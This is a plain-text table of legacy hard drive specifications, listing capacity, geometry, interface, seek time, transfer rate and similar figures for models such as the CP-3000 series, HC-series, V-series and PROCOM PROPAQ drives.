ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-30124 FILEPR 3.50 25.4 125.0MB NONE AUTO 1 2 VC IDE(AT) 14ms 24.0Mb 32KB 2.8W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-30170 FILEPR 3.50 25.4 170.0MB NONE AUTO 1 2 VC SCSI-2 13ms 31.2Mb 64KB 250K 2.5W 4,500 RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-30170E JAGUA 3.50 25.4 170.0MB 1806 NONE AUTO 46 2 4 VC SCSI (1,7)RLL 2150 17ms 8.0ms 16.0Mb 32KB 150K 2.5W 3,833 RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-30174 3.50 1.0" 162.0MB 1806 NONE AUTO 46 2 4 VC 903 46 8 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-30174 FILEPR 3.50 25.4 170.0MB NONE AUTO 1 2 VC IDE(AT) 13ms 31.2Mb 64KB 250K 2.5W 4,500 RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-30174E JAGUA 3.50 25.4 170.0MB 1806 NONE AUTO 46 2 4 VC IDE(AT) 903 46 8 (1,7)RLL 2150 17ms 3.0ms 16.0Mb 32KB 150K 2.5W MiG HEADS, 3,833 RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-3020 3.50 1.0" 21.5MB 632 NONE AUTO 33 1 2 VC SCSI (2,7)RLL 1150 27ms 8.0ms 10.0Mb 8KB 50K 3.1W 3,575 RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-30200 COUGAR 3.50 25.4 212.6MB 2124 NONE AUTO 49 2 4 VC SCSI-2 (1,7)RLL 2496 12ms 3.0ms 20.0Mb 256KB 150K 5.2W R/S ECC, 4,500 RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-30204 COUGAR 3.50 25.4 212.6MB 2119 NONE AUTO 49 2 4 VC IDE(AT) 683 38 16 (1,7)RLL 2496 12ms 3.0ms 20.0Mb 256KB 150K 5.2W 88-BIT R/S ECC, 4,498 RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-3021 3.50 21.5MB AUTO VC (2,7)RLL COMPAQ OEM, TYPE 2 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-3021i 3.50 21.5MB AUTO VC (2,7)RLL COMPAQ OEM, TYPE 2 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-3022 3.50 21.5MB 636 AUTO 1 2 VC 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TK/TK RATE CACHE MTBF USED COMMENTS + ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + CP-30254 FILEPR 3.50 1.0" 251.0MB NONE AUTO 2 4 VC IDE(AT) 14ms 24.0Mb 32KB 2.8W OPTIONAL 64KB CACHE + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-30340 FILEPR 3.50 25.4 343.0MB NONE AUTO 2 4 VC SCSI-2 13ms 31.2Mb 64KB 250K 2.5W 4,500 RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-30344 FILEPR 3.50 25.4 343.0MB NONE AUTO 2 4 VC IDE(AT) 13ms 31.2Mb 64KB 250K 2.5W 4,500 RPM + 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TK/TK RATE CACHE MTBF USED COMMENTS + ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + CP-341i 3.50 HALF 42.9MB 805 NONE AUTO 26 2 4 VC IDE(AT) 788 26 4 (2,7)RLL 7.5Mb COMPAQ OEM, TYPE 43 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-342 3.50 HALF 42.9MB 805 NONE AUTO 26 2 4 VC IDE(AT) (2,7)RLL 29ms 7.5Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-343 3.50 HALF 42.9MB 805 AUTO 2 4 VC IDE (2,7)RLL 1000 29ms 7.5Mb FOR ZENITH PORTABLE + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-344 3.50 HALF 42.9MB 805 NONE AUTO 26 2 4 VC IDE(AT) (2,7)RLL 1000 29ms 7.5Mb 20K 4.3W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-3500 SUMMIT 3.50 HALF 510.0MB 1695 AUTO 49 6 12 VC SCSI (2,7)RLL 2100 12ms 4.0ms 16.0Mb 256KB 100K 4.5W 3,609 RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-3504 SUMMIT 3.50 HALF 510.0MB 1695 NONE AUTO 49 6 12 VC IDE(AT) 987 63 16 (2,7)RLL 2100 12ms 4.0ms 16.0Mb 256KB 100K 4.5W 3,609 RPM + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + CP-3540 SUMMIT 3.50 41.3 543.7MB 1807 NONE AUTO 49 6 12 VC SCSI-2 (2,7)RLL 2150 12ms 3.0ms 20.0Mb 256KB 150K 6.7W 88-BIT R/S ECC, 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TK/TK RATE CACHE MTBF USED COMMENTS + ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + HC-150 5.25 FULL 156.0MB 969 35 3 5 ESDI (2,7)RLL 16ms 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HC-175 5.25 177.8MB AUTO 8 ESDI (2,7)RLL 16ms 10.0Mb 150K 11.0W + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HC-200 5.25 200.0MB 8 IDE(AT) 16ms 8.0Mb 150K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + HC-260 5.25 FULL 260.0MB 1212 35 6 12 ESDI (2,7)RLL 16ms 10.0Mb + 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HGT. UNFORMAT FORMATED CYLS COMP ZONE TK PL HD AC FACE CYLS TK HD METHOD /IN. AVE. TK/TK RATE CACHE MTBF USED COMMENTS + ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ + P738 5.25 FULL 382.0MB 329.0MB 1225 8 15 SCSI (2,7)RLL 20ms 10.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + V130R 5.25 FULL 39.0MB 987 26 2 3 ST506/412 (2,7)RLL 7.5Mb see also VERTEX V130 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + V150 5.25 FULL 42.0MB 987 17 3 5 ST506/412 (1,3)RLL 5.0Mb see also VERTEX V150 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + V160 5.25 FULL 50.0MB 1166 17 3 5 ST506/412 (1,3)RLL 5.0Mb see also VERTEX V170 + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + V170 5.25 FULL 60.0MB 987 17 4 7 ST506/412 (1,3)RLL 28ms 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + V170R 5.25 FULL 91.0MB 987 26 4 7 ST506/412 (2,7)RLL 7.5Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + V185 5.25 FULL 72.0MB 1166 17 4 7 ST506/412 (1,3)RLL 28ms 5.0Mb + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PROCOM TECHNOLOGY + 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ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PROPAQ 100 3.50 HALF 105.0MB IDE(AT) 25ms 10.0Mb 20K + ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ + PROPAQ 185-15 3.50 HALF 189.0MB 5 IDE(AT) 5.9mB 70K + 